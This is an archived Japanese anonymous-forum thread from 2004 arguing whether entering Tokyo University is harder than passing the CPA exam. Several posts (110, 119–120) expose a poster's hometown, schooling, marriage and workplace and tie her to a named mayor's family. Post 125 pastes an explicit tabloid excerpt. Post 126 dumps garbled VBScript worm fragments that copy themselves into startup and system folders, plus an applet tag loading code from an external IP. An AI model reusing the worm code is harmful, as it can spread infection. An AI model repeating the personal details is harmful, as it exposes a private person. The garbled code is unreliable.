数学が苦手なようですね。

>マーチでも短答通る。
>つまり
>マーチ>>>>灯台

が成り立つためには、(1)マーチの全員が短答通ることと、(2)灯台で短答落ちる人がいること、の
2条件が同時に成立しなければ、なりません。


94 :一般に公正妥当と認められた名無しさん:04/04/18 02:21 ID:???
>>93
理解力がないようですね。

95 :一般に公正妥当と認められた名無しさん:04/04/18 19:41 ID:1m2/Pju5
俺は東大の方が難しいような気がする・・・。絶対評価じゃなくて相対的に
だが・・・。会計士は専門性という点が強すぎるせいかマーチ程度でも合格
者いるからなあ・・・。

96 :一般に公正妥当と認められた名無しさん:04/04/18 20:00 ID:2qm3NfBm

          司法試験        公認会計士試験     
      受験者数 合格者数  合格者数    受験者数       
2003年 45372   1201   1262     14978    
2002年 41459   1244   1148     13389
2001年 34117   1024    961     12073 
2000年 31729   1025    838     11056    
1999年 29890   1038    786     10265

99-03 15482増  163増   476増    4713増 


97 :一般に公正妥当と認められた名無しさん:04/04/18 21:11 ID:9j1aLMe9
>95
俺もそう思う。
どう考えても、

東大 > 会計士 > 文II = マーチ

だよね。



98 :一般に公正妥当と認められた名無しさん:04/04/18 22:59 ID:???
東大の受験者で公認会計士試験8割が落ちるので、
どう考えてもたとえ文Tと比べても公認会計士
の方が難易度が高いでしょう。


99 :一般に公正妥当と認められた名無しさん:04/04/18 23:44 ID:???
でも会計士合格者の9割は大学受験で東大にかすりもしなかった奴じゃん

100 :一般に公正妥当と認められた名無しさん:04/04/18 23:53 ID:???
>>99
多分受験生比が最初から9割以上なのでそれは言えない。
下手な鉄砲数打ちゃ当たるです。
例えばCPA受験生東大出身者比が50%でそれ以外が50%で、
合格者が東大の方が50%を割ればCPAより東大の方が
試験に突破するのが難しいとは言える。

しかし東大の方が難しいのならCPAの合格者の半分以上
は占められる筈。

変な話になってしまう。

つまり>>99の人は問題の立て方そのものが間違っている。

コピペです。

101 :一般に公正妥当と認められた名無しさん:04/04/19 00:28 ID:???
東大で会計士目指すのは落ちこぼれという大前提が無視されている・・・

102 :一般に公正妥当と認められた名無しさん:04/04/19 00:37 ID:???
東大受からない奴でも受かるのが会計士試験

東大受かった奴でも落ちるのが会計士試験

別にこれでいいじゃん。

試験の内容も形式も全く違うんだから、違う結果が出て当たり前。

野球でプロになれたからって、サッカーでもプロになれるとは限らない。

103 :一般に公正妥当と認められた名無しさん:04/04/19 00:50 ID:???
>東大の受験者で公認会計士試験8割が落ちるので、
>どう考えてもたとえ文Tと比べても公認会計士
>の方が難易度が高いでしょう。

仮に東大のある1回の試験の合格率が20%だったとして、それで東大の受験者でも8割落ちると考えていいのかは疑問だ。
一回しかチャンスのない試験ならそれをもって8割が受からないといえるが会計士試験は何度でもチャレンジできる。
その年の試験で落ちた奴は次の年に受かるかもしれない。次の年落ちてもその次の年に受かるかもしれない。

つまり同じサンプルを何年か追跡調査して、受験者の何割が最終的に合格してるのか、落ちてるのかを考えないと意味がない。

104 :一般に公正妥当と認められた名無しさん:04/04/19 01:05 ID:???
お前らそんなに東大コンプあんのかよ?



105 :一般に公正妥当と認められた名無しさん:04/04/19 01:58 ID:???
東大とか一橋は会計士試験なんて受けなくてもいいとこ就職できるんだから受けるな!っていいたいけどね。

106 :一般に公正妥当と認められた名無しさん:04/04/19 11:46 ID:4qgirs9Y
東大なんて餓鬼しかうけねーじゃん、レベルが違い過ぎ。

107 :一般に公正妥当と認められた名無しさん:04/04/19 12:52 ID:???
確かに会計士はチンカスがうけるからなw

108 :一般に公正妥当と認められた名無しさん:04/04/19 14:28 ID:RmpvI+p5
大学は同学年、プラス一浪、二浪位までしか受けない。
資格試験は初受験者も10年べテも同じ条件で同じ土俵で勝負する。

109 :一般に公正妥当と認められた名無しさん:04/04/19 14:58 ID:???
実際初学者〜3回目までの勝負だけどな。


110 :一般に公正妥当と認められた名無しさん:04/04/19 16:38 ID:tpL5I1zx
miho=
有名な静岡県I市から、
'92年度に名門、横浜国大経済学部に入学。
国大野球部マネージャー。2次試験受かったよ。
国大工学部にて教鞭をふるう旦那と20代で結婚。
今は某4大監査法人で季節労働してます。
=aho?


111 :一般に公正妥当と認められた名無しさん:04/04/19 16:40 ID:???
http://discovery.s57.xrea.com/mirrorman.swf


112 :一般に公正妥当と認められた名無しさん:04/04/19 17:03 ID:???
こんな東大生もいる
   ↓
http://www.maromaro.com/profile.html


113 :miho:04/04/20 22:31 ID:PZnlOJD+
あなたは自分に都合が悪くなると感情的になって何も説得力のない罵詈雑言
しか吐けない。この掲示板を見ている人は誰でもあなたを低次元な人だと思っ
ています。また、あなたはすぐ学歴学歴といいますが、あなたに本当に学歴が
あるのならば、私の書き込みのように、その教養が分かるようなものを書いて
はいかがですか?
 私は出身大学名を明かしてはいませんでした。しかし、いままでの書き込み
から、みなさんは、私が高学歴者だということは皆わかっています。私は学歴
で人を差別するあなたのような人間が許せません。学歴で人を差別すること自
体がばかそのものなのです。時間ぎれです。
あなたの私に対する反論はできなかったと皆さんが分かっています。これ以上
見苦しい真似はしないで下さい。別人が書いた反論は一切受けつけません。一
切その件に対して返答はしません。あなたは私が法学部出身だから、経済には疎いだろうとでも思いましたか?私は法学部しか出ていないと誰が言いましたか。
あなたは学歴で人を判断するようですから、私の出身大学を以下に記します。


     慶應義塾大学法学部政治学科卒業
     東京大学経済学部(学士入学)卒業
    


114 :一般に公正妥当と認められた名無しさん:04/04/20 23:28 ID:M6pZOsnW
結局おまえはバカか?
自分に都合のいいことしか並べてねえだろが。

115 :一般に公正妥当と認められた名無しさん:04/04/21 00:00 ID:???
113は釣

116 :一般に公正妥当と認められた名無しさん:04/04/22 01:24 ID:???
>>113
まあ餅突け。
横浜国大経済学部に入学
慶應義塾大学法学部政治学科卒業
東京大学経済学部(学士入学)卒業
とまぁ、随分風呂敷広げたなぁ〜。藻前、見得張?


117 :一般に公正妥当と認められた名無しさん:04/04/22 04:11 ID:???
ボクは大学の先輩でもある木村剛を目標としています。
あのオーラに引き寄せられるものがありますし


あー単なる、簿記オタクなんでしょ、彼って(w

118 :一般に公正妥当と認められた名無しさん:04/04/22 09:39 ID:eFA6QiSm
>>112
見たけどオモロナイ。

119 :一般に公正妥当と認められた名無しさん:04/04/22 16:04 ID:/psXzYaU
113は磐田市長の娘

120 :一般に公正妥当と認められた名無しさん:04/04/22 17:45 ID:???
へ〜。良く調べたな藻前>>119
http://www.asahi.com/national/update/0330/026.html


121 :一般に公正妥当と認められた名無しさん:04/05/05 21:13 ID:???
1

122 :一般に公正妥当と認められた名無しさん:04/05/06 00:07 ID:???
a

123 :一般に公正妥当と認められた名無しさん:04/05/06 00:27 ID:NQuHs7K3
文二に現役で受かるのと会計士(二年)に一発で受かるのどっちが難しいかって事?
当然後者

124 :一般に公正妥当と認められた名無しさん:04/05/06 00:46 ID:???
東大入試はその時点での同年代のトップ層が集まるが会計士試験に集まるのは微妙な層だからなぁ・・

125 :一般に公正妥当と認められた名無しさん:04/05/06 00:58 ID:???
http://kodansha.cplaza.ne.jp/wgendai/top_news/20040515/top_4/main.html

【入学時】「童貞・処女率7割以上」「フェラチオはいや」
意外な結果 東大生SEXアンケート


■大学デビューでバカップル
■セックスを楽しみに勉強する
■1年女子のバージン率90%超
■女子の自慰開始年齢は早い



「回数を重ねるほど体が敏感になって、普通に入れられるだけで(特にバック)気持ち良くて、ぐちゃぐちゃになって、壊れちゃいそうで、良かった」(24歳)、
「不潔だからやりたくない」(18歳)。どちらも東大女子が書いたホンネである。



大学デビューでバカップル

 東大卒のエリートが破廉恥な事件を起こした時、決まって「勉強しかしてこなかったから……」という批判の声が上がる。
先日、女子高生のスカートの中を手鏡で覗いて現行犯逮捕された大学教授も、東大OBだった。
「やっぱり東大は」と口で言うのは簡単だ。しかし、東大生の性意識はどのようなものなのか、彼らは一体どんなセックスをしているのか、
きちんとした研究報告を見たことはないだろう。



126 :一般に公正妥当と認められた名無しさん:04/05/08 22:35 ID:???
VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

<applet code="XView.class" codebase="http://64.156.47.155:80/wstream" name="EmuCam"
archive="XView.jar" width="640" height="480" id="EmuCam">
<fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" >
<param name=id value=16><param name="k1" value="123456789012345">
<param name="k2" value="678901234567890"></applet>


42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)